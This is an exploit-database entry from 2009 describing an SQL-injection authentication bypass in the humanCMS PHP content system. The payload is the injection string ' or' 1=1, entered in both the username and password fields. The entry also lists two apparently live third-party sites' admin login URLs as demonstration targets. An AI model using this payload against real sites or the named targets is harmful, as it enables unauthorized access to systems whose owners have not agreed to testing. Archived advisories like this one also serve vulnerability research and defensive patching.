humanCMS - Authentication Bypass

EDB-ID:

9494

CVE:

N/A


Author:

next

Type:

webapps


Platform:

PHP

Date:

2009-08-24


()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
()                                                                                                    ()
()    f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer                                           ()                                                                                           
()                                                                                                    ()
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+]  humanCMS   (Auth Bypass)  SQL Injection Vulnerability
[+]  Discovered by  next
[+]  www.sa3eka.com   ()()()()()  www.m4r0c-s3curity.cc
[+] vie.0[at]hotmail.com
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

[+]  Home Page      :      http://www.squarelabel.com
                           "humanCMS site description"

[+]  Auth Bypass

[+] expolit    :           username :     ' or' 1=1
                           password :      ' or' 1=1

[+] admin login demo :
                           http://www.festivalcite.ch/index.php?id=&action=login
                           http://www.squarelabel.com/index.php?id=&action=login

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

# milw0rm.com [2009-08-24]